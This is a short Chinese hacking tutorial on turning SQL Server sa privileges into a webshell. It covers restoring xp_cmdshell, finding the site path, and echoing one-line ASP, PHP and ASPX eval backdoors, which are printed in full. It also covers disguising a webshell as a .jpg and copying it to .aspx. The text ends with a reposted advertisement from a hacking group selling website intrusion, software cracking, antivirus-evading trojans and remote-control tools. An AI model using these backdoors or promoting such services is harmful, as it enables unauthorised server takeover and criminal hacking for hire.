sa权限获取webshell思路

  1.首先通过SQL查询分析器通过sa权限恢复xp_cmdshell存储过程。    2.通过SQL Tools2.0连接数据库,执行命令,查看网站路径和磁盘文件,获取网站的真实路径。    3.e...

  1.首先通过SQL查询分析器通过sa权限恢复xp_cmdshell存储过程。    2.通过SQL Tools2.0连接数据库,执行命令,查看网站路径和磁盘文件,获取网站的真实路径。    3.echo生成一个句子后门。    4.直接获取webshell权限。    5.如果无法执行echo生成的后门,可以通过查看相应网站的数据库获取后台登录密码,并通过后台上传webshell jpg。然后使用copy命令将jgp文件复制到aspx文件以获取webshell。 技能:    1.查找可写文件夹,例如c:/windows/temp,以及该站点的真实路径。
   2.通过echo命令生成一个句子后门    echo ^<%eval request(cmd)%^> ^> d: \ wwwroot \ ok.asp    echo ^<php @eval($ _ POST [cmd]);^> ^> cmd.php    echo ^<%@ PageLanguage='Jscript%'^> ^< ^%eval(Request.Item ['pass'],'unsafe');%^> ^> c: \ inetpub \ wwwroot的\ cmd.aspx 转自:原始 飓风网络安全 黑客业务列表介绍和一般分类: 类别:攻击入侵破解开发 1:攻击业务订单:暂时取消所有此类业务订单[仅销售常规IDC流量] 2:入侵业务清单:包括网站源代码,办公系统,黑色系统,教育系统等。 3:破解业务类:软件,加密文件,二次打包,脱壳等。 4:二次开发业务清单:软件二次开发,源代码二次开发等 5:其他业务订单:特洛伊木马[通过所有防病毒],远程控制,特殊软件等 备注:未提及的业务订单可根据主要类别查询或直接联系客户服务。为避免浪费双方时间,请在咨询前阅读:业务交易流程及相关说明 注意:仅接受正式业务,个人无权接受。收集此内容。